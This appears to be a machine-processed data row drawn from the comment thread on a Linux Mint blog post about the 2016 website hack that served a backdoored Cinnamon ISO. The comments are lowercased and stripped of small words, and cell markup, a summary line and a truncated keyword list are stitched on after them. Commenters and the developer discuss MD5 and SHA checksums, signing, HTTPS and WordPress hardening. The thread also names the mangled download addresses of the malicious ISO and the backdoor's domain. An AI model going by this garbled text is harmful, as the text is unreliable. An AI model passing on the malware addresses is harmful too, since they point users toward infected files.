february cinnamon versions correct installed linuxmint173xfce64bit today concerned reading blog edit clem check safe it’s cinnamon reply fred barclay says february clem thanks straightforward quick know guess targeted price making popular linux distro thankfully haven’t downloaded anything within last days considering might happen guys considered sort besides md5sums verify isos come maybe something like server hacked isos replaced publicly listed md5sums changed isos would still incorrect signatures assuming start signing releases posting link linux mint main page public mint attacker could still replace isos malicious ones replace link links combat community forums know several besides could sign mint keys trust could mint mean even could easily create claims clement lefebvre would much harder actual attacker sign keys several members community idea thought might interested sure whatever guys great also think could make announcement forumslink edit clem really helps duplication community alerted fast able alerted people could find contradicting md5s that’s mostly md5s aren’t place many another thing going help servers separate services even somebody hacks wordpress there’s wordpress server nothing else reply nizzle says february doesn’t much good post hashes site that’s served linuxmintcom https edit clem it’s planned hoping it’ll happen soon please note wouldn’t helped though you’d served exact hacked information https reply harry says february clem happen there’s https protection mint website edit clem need https protect communication mostly side local middle attacks intrusion nothing protocol hackers used wordpress reply chris black says february downloaded installed linuxmint 18’th using link official website right thanks edit clem check signature precaution reply concerneduser says february clem confirm hashes posted page valid aren’t signed page isn’t even served https know could spoofed well edit clem find httpftpheanetiepublinuxmintcomstable173 also along signed sha256sums reply erick says february really appreciate keeping posted passed along another friend knows devoted linux mint going similarly anyone checked repositories though i’ve anything seemingly affected always thankful guys working project straight forward proactive thank guys diligent enough transparent enough know case keep updated though pursuing action waiting authorities know sent information edit clem it’s main concern clean back safe operational reply aritz cracker says february hey… realized previous comment sounded demanding guys literally impossible really appreciate thank reply balloon fusen says february sure linux mint website download page still hacking address link added httpsscrotmoeimagejtvq done cinnamon download dangerous reply says february warning download links still redirecting bulgarian download clem please disable downloads gurantee user safety edit clem shut server find source second intrusion probably something left first reply body says february wordpress shit reply patrick says february please https support linuxmintcom whether it’s related hacking really unacceptable edit clem it’s reply bananabob says february downloaded copies cinnamon oceania links university canterbury xnet coming incorrect md5sum 7d590864618866c225ede058f1ba61f0 course installed time nzst date feburary long trusted download edit clem that’s md5sum hacked alright server taken know it’s safe sorry can’t give reply robert says february looks like lucky one… decided laptop yesterday version mint couldwould update downloaded rufused installed… interesting times reply gunvolt says february linuxmintcom httpswwwdropboxcomsyuawahvhbmj82byscreenshot20from202016022020203a203a51pngdl1 edit clem can’t investigate clean still open attacks take reply hayden says february gentoo user mainly trying find mint site wasn’t working ended netbook 32gb enough free space windows update even micro want marks clem personally responding nearly every post mark legend reply says february mint still something like sanctuary probably many feel warm safe strong alive absolutely hate fact someone took advantage clean wonderful world linux mint personally offer anything power help back reply tracy says february downloads elsewhere fine mine httpmirrorinternodeonnetpublinuxmintstable173 reply zoltan says february thanks clem taking quick action upfront would like call everybody reading spread warning others might know using mint case haven’t seen post afraid many people mint don’t read blog might aware danger access linuxrelated blog feed share people might downloaded hacked isos day… reply chris black says february thanks checked still gone live session file varlibmancy infected found mandb hope it’s total noob it’s first linux years windows reply fred barclay says february bananabob chance didn’t delete isos like examine possible reply veed says february “edit clem breach made wordpress wwwdata shell” “edit clemanother thing going help servers separate services even somebody hacks wordpress there’s wordpress server nothing else” speculating cracker exploits gains shell webserver user wwwdata reported looks wpconfigphp uses username password file gain mysql shell fine since mysql bound localhost usually cracker wwwdata user probably search made post wanted download links edited things suggest ensure webserver user’s shell binfalse binnologin binsh binbash spend quality time planning separation privilege software webserver user write access little possible wpcontent wordpress ensure incremental automated backups make accessible webserver user usage chroot jails really separate stuff sorry happened people clearly thrill ride wanted backdoored installs scary reply kurt says february updated software update link today update manager didn’t clean install affected reply says february want make things better least following completely rebuild everything verify nobody made changes code assume you’re using like easy rebuild everything development machine move downloads separate server serving static files mysql make sure developers using secure passwords generated something like keepassx ensure it’s using hsts enabled important makes sure everyone using also disable outdated ciphers like here’s help httpswikimozillaorgsecurityserversidetlsrecommendedconfigurations provide magnet links signatures downloads https reply brown says february newbie linux mint downloaded morning sunday melbourne australia notice found check sums incorrect took recommended action kept wget file following address http5104175214stable173linuxmint173cinnamon64bitiso reply ryan says february argh minor panic attack checking downloaded tuesday e71a2aad8b58605e906dbea444dc4983i figured possible earlier attack missed might well check safe matched listed panicked started tell reread post realized clean need sleep saying think make post clear listed md5s safe ones reply says february time retaliate send shit back… lets work guys know youre reading back topic clem please consider releasing website time pure html5 forum blog separate hosting devintegratiotalk another host cost little best interest isos could default server html5 partners around world reply archsiderreal says february phew thank goodness downloaded torrent finished downloaded yesterday post really scared reply aaron says february update install request downloaded machine compromised reply chair says february could someone upload backdoor virustotalcom post back hash reply niko says february hopefully website coming back soon need technical support don’t hesitate contact maybe help server hosting contact best wishes niko reply freak says february literally downloading cinnamon tonite going slow said hours viewing httplinuxscoopcomvideofedora23workstation another firefox said clickjack attempt half downloaded panic closed tabs think unusual supposed clickjack attempt downloading second time ever please check site’s carefully wondering possibly infected incomplete download real “coincidence” clicking link possible also please update detailed asap reply says february clem blog currently running wordpress latest version blog running version exploited older version hadn’t updated update exploit happened could exploit caused vulnerable extensionaddonthemeetc whatever find report whoever patch thank transparently reporting info honestly organizations encounter situations like would prefer nothing hide deny ever happened downplay obscure seriousness damage public relations sick game deceit sometimes thank honesty openness edit clem answering 24th info brand version plugins using theme called sydney said already backdoors forums think file permissions reply zombieland says february second recommendation sign isos host sigs keys https really small files important checksums switch using sha512 whirlpool reply darkwolf says february wanted requesting linuxmintcom https would absolutely nothing prevent attacks would guarantee information hashes site legit encrypt data server viewer prevent data sniffed however site compromised false information fake hashes posted https isn’t going make difference flip side however site really https enabled help encrypt data servers administrative access help decrease chance mitm attacks sniffing mixed usage site recipe disaster fact httpbloglinuxmintcomwploginphp even accessible checked really disturbing probably biggest risk it’s hard move another location even plugins specifically designed even moving login page allow requests administrative areas specifically access areas hard modified htaccess file denies access administrative areas preset addresses need gain access location list modification htaccess temporary easy ideas… reply freak says february you’re moderating maybe make link ‘not clickable’ accidentally clicks it…idk thankx reply senpai says february sorry hear guys hacked thanks upfront honest happened wordpress seem quite history sorts incidents plans move away perhaps time would manpowerresource website help maybe someone community wouldn’t mind crack volunteer team interested mint’s done it’d nice give back reply snicky says february downloaded installed xfce days already removed understand claim cinnamon version hacked would still feel much safer checks confirm installation virusfree reply kevin says february question checked live session found mandb mancy safe reply kenweill says february mentioned links isos compromised also mentioned comments repositories we’re compromised check machine infected backdoor update soon there’s update available kernel upgrade posted wonder there’s check system clean kind backdoorinfection thanks reply says february wonder there’s check system clean kind backdoorinfection” might asking httpwwwkernelmodeinfoforum staff seems quite know reply daniele says february sorry yesterday i’ve downloaded lmde2 torrent checking anyway case can’t compare since site down…the terminal says” 55d22b55687770f7e60013ccf1575baf lmde2201503mate32bitiso” right reply philips says february underscores serious problem linux mint’s release integrity totally broken takes hour generate collision regular hardware hackers placed backdoored isos servers valid md5s would hard detect surprised didn’t attempt hash collision breach need switch secure hash functions like sha256 redundancy community reporting issues also need secure prove hashes authentic hackers changed hashes listed server hashes backdoored isos would also make hard detect breach example wordpress blog post could hacked hashes listed “valid” could changed none would know start signing either hashes isos every serious distro it’s easy excuse never happen reply discord says february think could false flag attack andor connection kennedy assassination reply usama says february hope md5sums sha256sums could party external server maybe repository think it’s secure isos md5sums server reply says february downloaded 64bit mint cinnamon torrent 20th affected also reply gösta rapp says february burn check installation installed januari maybe reply andy mitchell says february well damn shame bloody pain arse guys double checking presume lmde2 unaffected intrusion hope sake everyone cleared soon good luck reply capivara says february fast reaction good work warn many people many channels possible isos quite ‘old’ hence affected reply fragmede says february considered releasing version simply users redownload filename reply says february possibility happened previously older versions reply misterch0c says february place researchers either malicious files whole infected reply says february affect updates mint domains possible modify signing thus allowing malicious updates downloads reply chris says february kenweill haven’t downloaded recently update usual aptget update manager affected concerning people downloaded installed linux mint recently please also read past comments especially reply alex says february hello made strange observation ping absentvodka brings following results ping absentvodkacom ping absentvodkacom bytes data bytes localhost icmpseq time bytes localhost icmpseq time bytes localhost icmpseq time bytes localhost icmpseq time absentvodkacom ping statistics packets transmitted received packet loss time 3000ms mdev installation upgrade version affected somebody idea reply tommy says february torrents site download httptorrentslinuxmintcom reply ngoro says february clem download good httpftpheanetiepublinuxmintcomstable173 reply davidpbrown says february still good practice important signatures sha256sum might provide confidence reply schafdog says february clem know prob busy cleaning getting sleep time information version wordpress lead breach kenweill easy solution it’s hard work could checksum files relevant packages compare another machine versions packages known clean find think assume repositories haven’t compromised reply liam says february really need ditch wordpress hosting downloads move static website doesn’t depend vulnerable plugins https ensure correct page served clients costs nothing thanks let’s encrypt sign isos keys stored server enforce verification like tails reply rustey shackleford says february looks like bitcoin miners none happy httpbitcoinistnetlinuxmintbackdoorputsusersandbitcoinminersatrisk sorry doublepost delete first please reply jerry says february wondered site morning thought might server trouble thanks clem team dealing well quickly really makes asshole would attack like reply says february could please https online services readers sure checksums valid edit clem it’s coming please don’t trust page it’s https though protects local entourage doesn’t protect server hacked reply paul says february know unrelated maybe warning sign mint turn level updates updater reply samriggs says february sucks glad noticed right away clem installed awhile 20th good checked varlib folder seems clean double check things sure thanks quick response good wanted shout thanks quick response i’ll check back things cleared updates safe side don’t rush better clean sure good back home reply pingback fórum says february commented wordpress supricing wordpress never good securityrecord exactly method fault outdated software wordpress also considered replacing something better record like drupal maybe reduce attacksurface reply says february started downloading torrent stopped things correct concerned sites maintain wordpress hosting however servers 1and1 think 1and1 keeps pretty safe plugins wordpress hacked also since beefing wordpress 1and1 good shutting site attack alerting server hosted maybe hosting must check wordpress sites linuxmint still wait updates linux mint effected noticed posts reply says february timeframe shutdown another download like torrent something asking trying linux supposed sunday activity weekend reply carl duff says february scumbag thing benevolent project appreciate quickly making right decision inform public clem mint great reputation good reason reply says february notied submitting comment wordpress blog good hackers also different table names instead default using admin username also hacked recommend malware virus scanning files server sure back know file server compromised sites manage happened several times beefed bulletproof ithemes wordfence plugins protect would also recommend googling stronger wordpress read every month continue make sites stronger good httpspremiumwpmudevorgblogkeepingwordpresssecuretheultimateguide need advice probably email recommend things reply rubble says february please sign releases checksums good download verification signatures real deal reply mikal says february hope clem linux mint developers take privacy seriously terms website importantly mint well applying kernel updates moved high development agenda basic implementations like reply bananabob says february fred barclay still copies isos want clem that’s understand problem extra work involved reply moem says february sentence starts know unrelated but”… really worth finishing clem thank vigilance it’s appreciated crackers fleas thousand camels infest miscreants’ armpits groin regions reply mike says february sorry didn’t torrents affected direct http version affected either actually affected edit clem website links pointing mirrors weren’t pointing mirrors hacked reply andrea says february sucks total support clem whole team using mint moment love used many years soon everything running i’ll make donation support guys reply kappazjani says february download cinnamon able want install work want know safe reply says february mirrors affected links website clean httpmirrortelepointbg reply pepecrans says february yesterday downloaded linuxmint173cinnamon32bitiso according file properties md5sum checksout jumped website must compromised time good luck resolving issue reply daniel coffey says february facebook even offering hacker side issue “people also shared” list showing compromise mint blog appeared mint days reply says february md5sum please clarify “once live session file varlibmancy infected iso” live session directory varlib infected file mancy reply says february dear linux mint team i´ve downloaded file 19th affected unfortunate occurence happened linux mint website reply cat1092 says february include mirrors hosts linux mint downloads also mine james madison university site area it’s fastest hand couple mint point release mint usable don’t like takes away much cpufreq answer filed disable intelpstate would make mint older versions scared something mess i74790k reply gerry says february download found mancy installed partition next win8 secondary laptop drive however think lucky even though connect network able access websites service working able ping able access websites didn’t login anywhere found blog post searching solution could confirm safe thanks gerry edit clem afaik backdoor couldn’t create initial connection without resolution tries list domain names you’re probably safe make sure wipe install destroy though it’s already done reply alexander says february maybe torrent option harder hack long server cold publish torrent files blog people need download isos reply kyhwana says february bananabob like copy backdoored well seemed quite size difference legit backdoored wasn’t explained script unfortunately could’ve grab full copy attackers server taken offline could upload mega torrentetc somewhere grab reply stéphane bortzmeyer says february careful attribution link bulgaria obvious first address registered belize verdina code bulgaria probably mistake since city contact lyubomir bambov mentioned address bulgaria know internet databases purely declarative verdina client could anything second domain absentvodkacom public data hidden behind proxy cannot really tell third domain went january another address belize verdina goes convenient remote access reply andy says february could please detail website hacked think would help admins alot experiencing situation reply felix says february please don’t kind integrity check anymore it’s possible attacker craft modified checksum original sha2based sums reply plata says february maybe would good internet standard automatic checks md5sums general something like they’re trying tails httpstailsboumorgblueprintbootstrappingextension reply jvdb says february dutch techsite reading forum also beïng hacked true need change passwords reply jonas wielicki says february dear clem thank great work linux distribution informing community right away sympathy would want going right questions though first don’t immediately involve authorities seems right thing attacked potentially large amount users could affected second politely suggest read third could link shasums provided comments prominently post also mirror server linked supports https fourth however know first priority currently looked letsencrypt safe quick https running linux mint websites best regards reply peatsy says february clem regarding know compromised edition linux mint cinnamon edition downloaded another release another edition affect downloaded torrents direct http link doesn’t affect either’ afraid right friday 20th downloaded iso’s first 64bit xfce torrent checked md5sum faulty result deleted download secondly tried direct download 64bit xfce problem incorrect md5sum deleted couple hours later downloaded 64bit cinnamon directly heanet checking md5sum getting result deleted gave probably informed guys earlier unfortunately didn’t sorry reply florian says february hello clem friend promoter linux mint surprised reply fred barclay’s post don’t react constructive suggestion using signatures download verification instead fully ignore talk great duplicated md5sums cryptographic signing global facto standard secure verification digital data can’t stressed enough contrary posting known insecure md5sums hacked website wordpress download link even providing secure https connections imho least grossly negligent hard interpret dead canary well aware illusion closer harder fight tools massively improve fingertips nevertheless thanks great distro regards florian reply danilo says february tried install linux mint installer pendrivelinux 19th gave error choosing partition gave installing tried redownload 20th however error occured gave today read start mint using stick wanted install computer installer failed really reset entire windows damage done isn’t reply lilydjwg says february please refer checksums signatures it’s misleading user verifies real meaning signatures instantly know things happened keeps safe reply onequestion says february sure values page modify reply community says february team would like thank open transparent event opener general important keep “our basement safe moreover would like point reacted extremely fast hacks generally undetected months thank know passing shitty time moment even since work passion foss please keep mind victims wrongdoers please keep process transparent possible hesitate people help good luck reply yuka says february linux rather dumb questions downloaded affected windows wanted install linux mint haven’t done anything neither opened burned windows contaminated well edit clem file isn’t dangerous what’s dangerous backdoor within included installed reply says february clem still want wordpress please consider spending little time hardening wordpress installation several excellent plugins available assist process ithemes enough keep determined attacker certainly improve odds random script kids classic exploits better compartmentalize don’t wordpress system anything important reply bash64 says february cat1092 address cpufreq intel pstate issues ebook turbo chapter download website httpbettyboopdatabaseatwebpagescombook reply luuk says february maybe look advertisements page openofflicepadottcom serious website something else good luck luuk reply zeta says february installed hacked version alongside windows partition likely data credentials read windows partition reply says february curious able narrow exactly breach happened primarily interested wordpress core exploit attack done vulnerable plugin reply senbagaraman says february good downloaded direct file mint cinnamon 64bit edition checked md5sum terminal matches exactly value given thanks developers telling problems user soon founding vulnerabilities can’t compromised digital worldtake measures good luck recovery beautiful make site running soon thank developers reply gawain says february you’re valiant clem upfront honesty refreshing indeed vigilance responding quickly deserve cold beer reply bartek says february still going wordpress problem touch oder distro like reply andy says february says february 21st md5sum please clarify “once live session file varlibmancy infected iso” live session directory varlib infected file mancy” would interesting case haven’t stored image file installed linux mint means file called “mancy” system clean right andy reply andrew says february that’s crazy timing… started downloading mint yesterday 20th going slow swapped different mirror… turns download history shows http5104175216stable173linuxmint173cinnamon64bitiso wanted download backdoor worked it’s anymore anyone look back door question interested reply eros says february thank segnalation control like attention trust claim never problems best regards eros reply m8ron says february news here… noob question website compromised can’t modify files signature additionally change sh256 better signature public keys independent website reply geoffrey says february downloaded kent site it’s haven’t able boot reason options hard drive superdrive done checksum check don’t match download trying breath life 8510w geoffrey reply doug says february hope able figure issues mint favorite distribution guess since people hacking mint considered popular reply user says february bother track back door rabbit hole lead edit clem fake sofia backdoor sofia also accessing server second backdoor russia look hole somebody looking need figure knows we’re reacting actions pretty clear take everything hacker russia could course even ddosed personal prevent taking site also took part since reply roland says february download install linux 32bit cinnamon yesterday 20th german server checksum valid however error message install caught attention “edid checksum invalid reminder downloaded burnt installed twice error message time might anything bulgarians still wanted know linux mint exciting wanted create account linuxmintorg post post instead course wondering corrupted i’ll probably reinstall either edit clem it’s related hacked would match reply garyj says february evidence attack wordpress it’s something core extremely unlikely report responsibly likely it’s poorly coded plugin theme also reported responsibly author concerned it’s file permissions server misconfiguration either accusing wordpress core without details detrimental edit clem found uploaded backdoor theme directory wordpress installation plugins running theme importantly think file permissions hours attack probably scanned something like anyhow don’t know uploaded know happened certainly pointing finger anybody people asked running wordpress wordpress used attack answered reply dalibor says february hope mess fast… hope switch</t>
+          <t>Hackers made a modified Linux Mint ISO, with a backdoor in it, and managed to hack the Linux Mint website to point to it.</t>
         </is>
       </c>
       <c r="D27" t="inlineStr">
         <is>
           <t>https://blog.linuxmint.com/?p=2994</t>
-        </is>
-      </c>
-      <c r="E27" t="inlineStr">
-        <is>
-          <t>['team', 'recent', 'post', 'monthly', 'news', 'news', 'edge', 'available', 'archive', 'archive', 'month', 'beware', 'comment', 'news', 'intrusion', 'today', 'brief', 'many', 'people', 'important', 'read', 'information', 'hacker', 'modified', 'hack', 'website', 'point', 'release', 'edition', 'torrent', 'direct', 'http', 'link', 'situation', 'today', 'impact', 'people', 'edition', '20th', 'check', 'check', 'signature', 'command', 'md5sum', 'yourfileiso', 'yourfileiso', 'valid', 'signature', 'linuxmint173cinnamon32bitiso', 'linuxmint173cinnamonnocodecs32bitiso', 'linuxmint173cinnamonnocodecs64bitiso', 'linuxmint173cinnamonoem64bitiso', 'stick', 'boot', 'computer', 'virtual', 'machine', 'offline', 'router', 'doubt', 'load', 'live', 'session', 'live', 'session', 'file', 'varlibmancy', 'delete', 'trash', 'disc', 'format', 'stick', 'computer', 'computer', 'reinstall', 'format', 'partition', 'change', 'password', 'sensitive', 'website', 'particular', 'normal', 'server', 'issue', 'backdoor', 'name', 'people', 'role', 'investigation', 'motivation', 'attack', 'effort', 'attack', 'project', 'goal', 'authority', 'firm', 'people', 'navigation', 'previous', 'previous', 'post', 'monthly', 'news', 'next', 'post', 'forum', 'user', 'password', 'comment', 'lot', 'server', 'problem', 'transparent', 'edit', 'clem', 'transparent', 'people', 'certain', 'extent', 'easy', 'thing', 'server', 'server', 'time', 'attack', 'ddo', 'important', 'communicate', 'attack', 'downtime', 'call', 'action', 'people', 'used', 'reply', 'doubt', 'question', 'important', 'information', 'unsettling', 'happy', 'many', 'question', 'reply', 'dumb', 'question', 'repository', 'upgrade', 'today', 'surprised', 'firmware', 'edit', 'clem', 'reply', 'torrent', 'difficult', 'compromise', 'edit', 'download', 'page', 'reason', 'isos', 'bulk', 'wget', 'strange', 'address', 'fact', 'file', 'download', 'page', 'family', 'friend', 'scammed', 'window', 'tech', 'support', 'scammer', 'joy', 'thank', 'second', 'attack', 'vulnerable', 'shutting', 'server', 'right', 'reply', 'intrinsic', 'detail', 'specific', 'detail', 'breach', 'fact', 'wordpress', 'good', 'thank', 'head', 'breach', 'wordpress', 'wwwdata', 'reply', 'lucky', 'time', 'stamp', 'file', 'mention', 'server', 'sufficient', 'info', 'intrusion', 'server', 'version', 'cinnamon', 'weather', '32bit', '64bit', 'version', 'lucky', 'edit', 'clem', 'today', '64bit', '32bit', 'link', 'bulgarian', 'server', 'compromise', 'reply', 'ubuntu', 'package', 'mint', 'firmware', 'system', 'component', 'reply', 'fresh', 'version', 'last', 'couple', 'hour', 'weird', 'unable', 'connect', 'internet', 'installing', 'able', 'router', 'checksum', 'functional', 'difference', 'genuine', 'version', 'interested', 'keyboard', 'input', 'thank', 'know', 'tsunami', 'info', 'version', 'correct', 'linuxmint173xfce64bit', 'today', 'concerned', 'reading', 'blog', 'edit', 'clem', 'safe', 'cinnamon', 'reply', 'thank', 'straightforward', 'quick', 'price', 'popular', 'last', 'day', 'guy', 'md5sum', 'server', 'md5sum', 'incorrect', 'signature', 'start', 'signing', 'release', 'link', 'main', 'page', 'public', 'mint', 'attacker', 'isos', 'malicious', 'one', 'link', 'link', 'combat', 'community', 'forum', 'several', 'beside', 'trust', 'mint', 'claim', 'clement', 'hard', 'actual', 'attacker', 'key', 'several', 'member', 'community', 'idea', 'guy', 'great', 'announcement', 'forumslink', 'edit', 'duplication', 'community', 'able', 'people', 'many', 'thing', 'server', 'separate', 'service', 'server', 'reply', 'good', 'post', 'hash', 'site', 'edit', 'exact', 'information', 'https', 'reply', 'https', 'communication', 'local', 'middle', 'attack', 'protocol', 'hacker', 'wordpress', 'reply', 'link', 'official', 'website', 'thank', 'check', 'signature', 'precaution', 'reply', 'concerneduser', 'hash', 'page', 'valid', 'page', 'https', 'sha256sum', 'reply', 'friend', 'repository', 'thankful', 'guy', 'project', 'proactive', 'thank', 'guy', 'diligent', 'transparent', 'know', 'case', 'action', 'authority', 'information', 'edit', 'main', 'concern', 'clean', 'safe', 'operational', 'reply', 'previous', 'comment', 'guy', 'impossible', 'thank', 'reply', 'balloon', 'page', 'address', 'link', 'download', 'dangerous', 'reply', 'warning', 'download', 'link', 'bulgarian', 'download', 'clem', 'download', 'user', 'safety', 'edit', 'server', 'source', 'second', 'intrusion', 'first', 'reply', 'body', 'reply', 'https', 'support', 'related', 'hacking', 'unacceptable', 'edit', 'clem', 'copy', 'incorrect', 'course', 'time', 'nzst', 'date', 'download', 'md5sum', 'alright', 'server', 'safe', 'sorry', 'reply', 'lucky', 'laptop', 'yesterday', 'version', 'update', 'interesting', 'time', 'reply', 'clean', 'open', 'attack', 'reply', 'user', 'mint', 'site', 'netbook', 'gb', 'enough', 'free', 'space', 'window', 'mark', 'clem', 'post', 'mark', 'legend', 'reply', 'sanctuary', 'many', 'warm', 'safe', 'strong', 'alive', 'fact', 'advantage', 'clean', 'wonderful', 'world', 'power', 'help', 'reply', 'download', 'fine', 'mine', 'reply', 'quick', 'action', 'upfront', 'spread', 'other', 'mint', 'case', 'post', 'afraid', 'many', 'people', 'blog', 'danger', 'access', 'blog', 'feed', 'share', 'people', 'thank', 'live', 'session', 'file', 'varlibmancy', 'mandb', 'total', 'noob', 'first', 'year', 'possible', 'reply', 'breach', 'wordpress', 'wwwdata', 'shell', 'thing', 'server', 'separate', 'service', 'server', 'cracker', 'gain', 'shell', 'webserver', 'user', 'wwwdata', 'username', 'password', 'file', 'gain', 'mysql', 'shell', 'fine', 'localhost', 'wwwdata', 'user', 'post', 'download', 'link', 'thing', 'webserver', 'user', 'binsh', 'binbash', 'quality', 'time', 'planning', 'separation', 'privilege', 'software', 'webserver', 'user', 'access', 'little', 'possible', 'wpcontent', 'wordpress', 'incremental', 'backup', 'accessible', 'webserver', 'user', 'usage', 'chroot', 'jail', 'stuff', 'people', 'thrill', 'ride', 'scary', 'reply', 'kurt', 'software', 'update', 'link', 'today', 'update', 'manager', 'install', 'affected', 'reply', 'thing', 'change', 'code', 'development', 'machine', 'move', 'separate', 'server', 'static', 'file', 'mysql', 'sure', 'developer', 'secure', 'password', 'keepassx', 'hst', 'important', 'sure', 'disable', 'outdated', 'cipher', 'help', 'httpswikimozillaorgsecurityserversidetlsrecommendedconfiguration', 'magnet', 'link', 'signature', 'https', 'reply', 'morning', 'check', 'sum', 'incorrect', 'action', 'wget', 'file', 'address', 'http5104175214stable173linuxmint173cinnamon64bitiso', 'minor', 'panic', 'checking', 'e71a2aad8b58605e906dbea444dc4983i', 'possible', 'early', 'attack', 'safe', 'reread', 'post', 'clean', 'need', 'sleep', 'post', 'clear', 'safe', 'one', 'reply', 'time', 'shit', 'work', 'guy', 'back', 'topic', 'clem', 'website', 'time', 'pure', 'html5', 'forum', 'blog', 'separate', 'host', 'little', 'good', 'interest', 'default', 'server', 'partner', 'world', 'reply', 'phew', 'yesterday', 'post', 'scared', 'reply', 'install', 'request', 'machine', 'reply', 'chair', 'backdoor', 'virustotalcom', 'hash', 'reply', 'website', 'technical', 'support', 'contact', 'contact', 'reply', 'freak', 'cinnamon', 'hour', 'httplinuxscoopcomvideofedora23workstation', 'panic', 'tab', 'unusual', 'clickjack', 'attempt', 'second', 'time', 'site', 'incomplete', 'download', 'real', 'coincidence', 'clicking', 'link', 'possible', 'detailed', 'asap', 'reply', 'blog', 'wordpress', 'late', 'version', 'blog', 'version', 'old', 'version', 'update', 'exploit', 'vulnerable', 'report', 'thank', 'info', 'organization', 'situation', 'deny', 'obscure', 'seriousness', 'damage', 'public', 'relation', 'sick', 'game', 'deceit', 'honesty', 'openness', 'clem', '24th', 'info', 'brand', 'version', 'plugin', 'theme', 'backdoor', 'forum', 'file', 'permission', 'reply', 'second', 'recommendation', 'sign', 'host', 'key', 'https', 'small', 'file', 'important', 'checksum', 'whirlpool', 'reply', 'prevent', 'attack', 'information', 'hash', 'site', 'datum', 'site', 'false', 'information', 'fake', 'hash', 'https', 'difference', 'flip', 'side', 'site', 'https', 'help', 'data', 'server', 'administrative', 'access', 'help', 'chance', 'mitm', 'attack', 'mixed', 'usage', 'site', 'recipe', 'disaster', 'fact', 'accessible', 'big', 'risk', 'hard', 'location', 'plugin', 'login', 'page', 'request', 'administrative', 'area', 'area', 'htaccess', 'file', 'access', 'administrative', 'area', 'preset', 'address', 'access', 'location', 'list', 'modification', 'htaccess', 'temporary', 'easy', 'idea', 'reply', 'freak', 'link', 'clickable', 'guy', 'thank', 'upfront', 'honest', 'wordpress', 'history', 'sort', 'incident', 'plan', 'time', 'website', 'community', 'volunteer', 'team', 'interested', 'mint', 'nice', 'reply', 'day', 'safe', 'check', 'installation', 'reply', 'question', 'live', 'session', 'safe', 'reply', 'kenweill', 'link', 'comment', 'repository', 'check', 'machine', 'backdoor', 'update', 'update', 'available', 'kernel', 'upgrade', 'wonder', 'check', 'system', 'clean', 'kind', 'backdoorinfection', 'thank', 'reply', 'check', 'system', 'clean', 'kind', 'backdoorinfection', 'staff', 'reply', 'yesterday', 'checking', 'case', 'site', 'terminal', 'lmde2201503mate32bitiso', 'right', 'reply', 'serious', 'problem', 'release', 'integrity', 'hour', 'generate', 'collision', 'regular', 'hardware', 'hacker', 'isos', 'server', 'valid', 'surprised', 'hash', 'collision', 'breach', 'secure', 'hash', 'function', 'redundancy', 'community', 'reporting', 'issue', 'secure', 'hash', 'authentic', 'hacker', 'hash', 'server', 'hash', 'hard', 'breach', 'example', 'wordpress', 'blog', 'post', 'hash', 'valid', 'none', 'hash', 'serious', 'distro', 'easy', 'excuse', 'reply', 'discord', 'false', 'flag', 'attack', 'andor', 'connection', 'reply', 'hope', 'md5sum', 'sha256sum', 'external', 'server', 'repository', 'secure', 'isos', 'md5sum', 'server', 'reply', 'torrent', '20th', 'rapp', 'burn', 'installation', 'damn', 'shame', 'bloody', 'pain', 'arse', 'guy', 'sake', 'good', 'luck', 'reply', 'fast', 'reaction', 'good', 'work', 'many', 'people', 'many', 'channel', 'possible', 'isos', 'old', 'reply', 'fragmede', 'say', 'version', 'user', 'filename', 'reply', 'possibility', 'old', 'version', 'reply', 'place', 'researcher', 'malicious', 'file', 'whole', 'reply', 'update', 'mint', 'domain', 'possible', 'signing', 'malicious', 'update', 'usual', 'aptget', 'update', 'manager', 'people', 'past', 'comment', 'strange', 'observation', 'result', 'byte', 'packet', 'packet', 'loss', 'time', '3000ms', 'mdev', 'installation', 'upgrade', 'version', 'idea', 'reply', 'torrent', 'site', 'download', 'good', 'reply', 'good', 'practice', 'important', 'signature', 'confidence', 'reply', 'schafdog', 'prob', 'busy', 'sleep', 'time', 'information', 'version', 'lead', 'breach', 'kenweill', 'easy', 'solution', 'hard', 'work', 'file', 'relevant', 'package', 'machine', 'version', 'package', 'clean', 'find', 'repository', 'reply', 'ditch', 'hosting', 'download', 'static', 'website', 'vulnerable', 'plugin', 'https', 'correct', 'page', 'client', 'thank', 'encrypt', 'server', 'verification', 'tail', 'reply', 'bitcoin', 'miner', 'none', 'happy', 'httpbitcoinistnetlinuxmintbackdoorputsusersandbitcoinminersatrisk', 'sorry', 'doublepost', 'delete', 'reply', 'site', 'morning', 'thought', 'trouble', 'thank', 'team', 'asshole', 'reply', 'online', 'service', 'reader', 'valid', 'edit', 'page', 'https', 'local', 'entourage', 'server', 'reply', 'unrelated', 'sign', 'turn', 'level', 'update', 'updater', '20th', 'good', 'varlib', 'folder', 'clean', 'double', 'thing', 'sure', 'thank', 'quick', 'response', 'good', 'thank', 'quick', 'response', 'thing', 'update', 'safe', 'side', 'clean', 'good', 'reply', 'fórum', 'wordpress', 'wordpress', 'good', 'securityrecord', 'method', 'outdated', 'software', 'wordpress', 'well', 'record', 'drupal', 'attacksurface', 'reply', 'torrent', 'thing', 'correct', 'concerned', 'site', 'wordpress', 'hosting', 'server', 'safe', 'plugin', 'wordpress', 'good', 'shutting', 'site', 'attack', 'server', 'hosting', 'site', 'update', 'noticed', 'post', 'download', 'torrent', 'activity', 'weekend', 'reply', 'thing', 'benevolent', 'project', 'right', 'decision', 'public', 'great', 'reputation', 'good', 'reason', 'reply', 'notied', 'comment', 'wordpress', 'blog', 'good', 'hacker', 'different', 'table', 'name', 'admin', 'username', 'virus', 'file', 'server', 'sure', 'know', 'file', 'server', 'site', 'several', 'time', 'beefed', 'wordfence', 'plugin', 'strong', 'wordpress', 'month', 'site', 'strong', 'good', 'advice', 'email', 'thing', 'reply', 'rubble', 'release', 'good', 'download', 'verification', 'signature', 'real', 'deal', 'reply', 'developer', 'privacy', 'term', 'website', 'mint', 'kernel', 'update', 'high', 'development', 'agenda', 'basic', 'implementation', 'copy', 'problem', 'extra', 'work', 'reply', 'sentence', 'unrelated', 'worth', 'thank', 'vigilance', 'cracker', 'flea', 'camel', 'miscreant', 'armpit', 'groin', 'region', 'reply', 'sorry', 'torrent', 'direct', 'http', 'version', 'affected', 'edit', 'clem', 'website', 'link', 'mirror', 'mirror', 'reply', 'total', 'support', 'whole', 'team', 'moment', 'love', 'many', 'year', 'donation', 'support', 'guy', 'able', 'install', 'work', 'safe', 'reply', 'mirror', 'link', 'website', 'clean', 'httpmirrortelepointbg', 'reply', 'yesterday', 'linuxmint173cinnamon32bitiso', 'file', 'property', 'md5sum', 'checksout', 'website', 'time', 'good', 'luck', 'issue', 'reply', 'facebook', 'hacker', 'side', 'issue', 'people', 'list', 'compromise', 